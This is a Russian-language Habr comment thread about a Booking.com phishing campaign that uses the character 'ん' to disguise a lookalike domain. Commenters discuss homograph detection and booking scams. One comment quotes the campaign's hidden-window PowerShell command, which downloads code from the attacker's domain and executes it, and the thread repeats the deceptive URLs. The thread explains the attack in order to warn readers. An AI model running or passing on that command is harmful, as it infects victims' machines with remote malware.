Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Поток Информационная безопасность доступен 24/7 благодаря поддержке друзей Хабра
Комментарии 74
У меня в системе совсем не похоже:
Скорее всего в письме был специально подобран шрифт, чтобы казалось схоже. Если у меня встречаются непонятные линки, я их обычно копирую в Блокнот или подобный текстовый редактор и смотрю, что там нарисовали.
Получить выплату можно на https://solar-stuff.comんpayments/
MSI пакет с вирусом прямо таки сам устанавливается при переходе по ссылке? Или пользователю нужно самому его всё таки запустить?
ВЫЯСНИЛОСЬ: Никакой автоматической установки НЕ БЫЛО
Что происходило на самом деле:
Из оригинальной статьи BleepingComputer и анализа видно, что процесс был следующий:
Переход по ссылке → пользователь попадает на поддельный сайт
Автоматическая ЗАГРУЗКА MSI-файла (НЕ установка!)
Пользователь должен САМ запустить скачанный файл
Пользователь должен САМ подтвердить установку в Windows
"Здравствуйте! Это эстонский вирус! Пожалуйста, разошлите меня всем адресатам из адресной книги и удалите содержимое папки Windows" (с) Народ.
вирус был албанский
Это тогда)
Афганский
Мне стало интересно. Самый древний анекдот, который я раскопал в энторнете по-быстрому, от 2001 года и вирус там без национальности )))
https://www.anekdot.ru/id/-10049918/
Но оригинал, наверняка, из фидо или юзнета пошёл...
в 2000-х встречался как ирландский (ИРА)
Тогда да, а сегодня эстонцы его обнаружили и скопировали
Скрытый текст
2. Как такое возможно?
Установка видимо так происходит:
В буфере обмена такое:
power shell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;" Ray ID: 1111111111111111 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="e11111"
Ну и до кучи: в любой системе, кроме Windows, не сработает, понятное дело.
для заражения сотрудников сферы гостеприимства вредоносным ПО
Проституток, что ли? Или отельеров? Или рестораторов?
Надо хотя бы прочитать перевод, прежде чем постить статью
но гиперссылка ведёт на «https://account.booking.comんdetailんrestric-access.www-account-booking.com/en/». На самом деле зарегистрированный домен — «www-account-booking[.]com».
Как я понял, там ещё поддомен(ы) с использованием национальных символов.
Вангую, что в браузерах появится проверка, что символы только английские, и предупреждение, если не так.
Вангую, что в браузерах появится проверка, что символы только английские, и предупреждение, если не так.
Не появится, ибо домены на национальных языках допустимы
Допустимы, но подозрительны. Поэтому проверка и предупреждение, а не блокирование.
Если весь домен/субдомен на национальном языке - ок. А вот помесь латиницы и национального языка в одной части по-хорошему надо бы запретить или как минимум научить браузеры такое подсвечивать.
Хм, а вы в курсе что куча национальных языков это латиница плюс несколько собственных букв?
А там точно латиница, а не символы, напоминающие латиницу?
Как минимум немецкий алфавит точно использует стандартную латиницу плюс свои. Можете в таблице unicode посмотреть например.
Да, вы правы. Погуглил, нашел вот такой список
https://gist.github.com/Argon42/6b28129e7b9e3ee353e55af80ee32757
Тут не все языки, но думаю все самые используемые есть.
Из списка видно, что мешать латиницу и арабский или вьетнамский языки нельзя. Латиницу можно мешать только с Latin-1 Supplement и Latin Extended-A
Т.е. сделать правила валидации в целом не так уж и сложно.
Юникод содержит море всего странного.
Любая смесь символов из разных языков или использование нестандартного символа в хостнейме должна вызывать предупреждение браузера. С возможностью добавить сайт в белый список у себя локально конечно же.
Из списка видно, что мешать латиницу и арабский или вьетнамский языки нельзя.
С 1910 вьетнамцы пишут латиницей.
Латиницу можно мешать только с Latin-1 Supplement и Latin Extended-A
Условный сок-j7.рф -- это кошмарно подозрительный домен?
Т.е. сделать правила валидации в целом не так уж и сложно.
Если не задумываться, прежде чем писать -- тогда-то конечно.
Условный сок-j7.рф -- это кошмарно подозрительный домен?
Несомненно подозрительный. Широчайшее поле для злоупотреблений. Для начала любой из первых трех символов может быть кириллическим или латинским, что дает 8 разных доменов. Наверняка есть еще похожие символы из других наборов. Смешивание в имени домена таких символов категорически недопустимо.
Скорее подсвечивать символы, отсутствующие одновременно в одном алфавите (те, которых меньше). Или хотя бы символы из другого вида письменности (латиница среди кириллицы или греческого или наоборот). В этом случае умляут какой-нибудь над латигицей среди латиницы вполне уместен, но хитрые закорючки польского одновременно с "немецким ятем" (эс-цет, который) - неуместны.
Возможно, опционально подсвечивать всю не базовую латиницу. Причем разные виды письменности по разному.
Мне кажется, у нас тут немного профдеформация и информационный пузырь. Обычные пользователи ищут в гугле яндекс и хорошо если вообще знают, что есть какой-то URL.
Я написал, что было бы хорошо видеть тем, кто таки знает, что такое URL и не любит, когда его скрывают тем или иным образом. Так что если URL показывается, то почему бы не раскрасить для тех, кто понимает?
Или если не попадаешь в большинство, то ради тебя и корячиться не стоит? Тогда непонятно, что в обычном браузере делают инструменты разработчика?
Так что если URL показывается, то почему бы не раскрасить для тех, кто понимает?
Потому что это куча потраченных усилий для решения проблемы, затрагивающей примерно никого; а фичи не появляются в продукте сами собой на основании "почему бы и нет". Если хотите, можете сами приготовить PR в любой опенсорсный браузер. Если не хотите -- не удивляйтесь, что и у других есть более важные дела.
Много лет назад, после подобной новости, нагуглил(или подсказали) плагин к ФФ под названием "IDN Safe" - практически это и делает, при наличии символов отличных от латиницы блокирует контент. Дальше из меню плагина можно разрешить открытие(временно, или постоянно). Держу как детектор левых символов в именах доменов, но не помню чтобы сталкивался с блокировкой чего-то кроме доменов в зоне .рф .
Пока сам не столкнулся, не ожидал, что на букинге такая дичь может твориться. Настоящая эпидемия. У них есть внутренний чат на сайте с объектами размещения после бронирования. Так вот рассылаются сообщения через этот чат от имени объекта с требованием онлайн регистрации и подтверждения номера карты. Сообщения выглядят очень достоверно, но ссылка на левый ресурс, а не на известные сервисы онлайн регистрации (которые действительно массово используются небольшими отелями и апартаментами). В противном случае угрожают отменить бронь и ставят дедлайн. Если отвечаешь, то продолжают угрожать. Отель при этом переписку игнорирует. Служба поддержки тоже реагирует очень медленно. Развод выглядит очень реалистично.
Некоторые отели в этом же чате сразу пишут, что не верьте этому чату. Что если кто-то будет писать сюда что-то, то звоните в отель напрямую.
в этом же чате сразу пишут, что не верьте этому чату
Тогда логично не поверить и потому поверить.
Хищники уничтожают слабых и больных
Странно конечно, что кто-то, кроме отеля и клиента, попадает в этот чат. Если взломали аккаунт отеля, то отелю нужно тут же менять пароль, а не сидеть в чате и писать параллельно с мошенниками...
Я никогда не видел кабинет отеля, но, возможно, мошенники не забирают полный доступ (иначе отель не смог бы вообще работать, не видел бы брони, не получал бы деньги и прочее, сразу бы пошел всё восстанавливать), а сидят параллельно (либо нового сотрудника добавляют в компанию, либо незаметно сидят на той же учетке). Может входящие сообщения не очень заметны, может оповещения на условную почту отключают, может просто делают прочитанными. Не знаю как работает, но проблема носит массовый характер. На reddit полно тем, в новостях периодически всплывает. Пример: https://euroweeklynews.com/2025/06/10/travel-alert-hackers-compromise-booking-com-channels/
Не надо ничего для других блочить, сиди себе и тихонько стреги деньги. Не Букинг, но Островок. Бронь на одни сутки, финал положительный, т.к. все реальные герои и положительные, но просто как кейс. Заезд поздний. Еду. Приходит в ВотсАпп сообщение, что это с отеля, у нас сегодня аншлаг и если хотите, чтобы номер остался за вами переведите деньги. Я конечно по номеру проверил, что да, номер относится к данному отелю и перевел. Но на трассе за рулем заниматься подобными пробивками не особо удобно.
Тут можно долго обсуждать какие взаимоотношения Островка с отелями и какого твоя бронь вроде как и не бронь и с забронированными номером можно остаться на улице. А так как езжу много с однодневными остановками, есть куча подобных вариантов, поле для мошенников, в данном случае, не паханое.
Потому что нефиг было разрешать в url что-то кроме ASCII
И никаких доменов "на батузаранском языке"
Странный какой-то заголовок - "Фишинговая кампания Booking.com ...".
Это что, Booking.com и есть фишинговая компания?
Вы же зашли, значит кликбейт сработал. На то он и рассчитан.
Я бы за такое поголовно ставил минуса в рейтинг публикации и автору лично, но инструмента нет и нет желания его получать.
кампания у компании, очевидно же, не? ;)
Кампа́ния (англ. campaign) — совокупность мероприятий, нацеленных на выполнение единой задачи.
В данном случае - фишинговая кампания против клиентов компании Booking.com.
Ваш КО
не, как раз не очевидно ))
Хотите, чтобы вирусописатели перешли на .sh?
Далее картинка мем с Джином Вайльдером(Gene Wilder)
А там есть картинка с "почему не работает этот код?" с обфусицированным рм -рф ?
Я такой же прикол видел на сайте госуслуги а потом оказалось что это не фишинговый сайт :(
Очередная причина в пользу автоматического использования punycode
Дожили, уже в заголовках люди безграмотные. "Кампания" и "Компания" путать это ужас. Всё чаще вижу безграмотных, пишущих что-то в общественное пространство. Отвратительно. Ладно комментарии - схавал, но уж когда статьи, посты и т.п. пишете, то уж можно было не класть хуй?
А я как-то не понял как это работает?
Очень просто, приглядитесь к ссылке внимательнее:
https://account.booking.comんdetailんrestric-access.www-account-booking.com/en/
На первый взгляд кажется, что домен тут - account.booking.com, а всё остальное - часть пути. На самом деле, домен тут - account.booking.comんdetailんrestric-access.www-account-booking.com.
К чему первый скрин? Смысл в другом же.
Да и заголовок — "Фишинговая кампания Booking.com" — как будто сам Booking.com это делает.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Фишинговая кампания Booking.com использует скрытый символ «ん» для обмана пользователей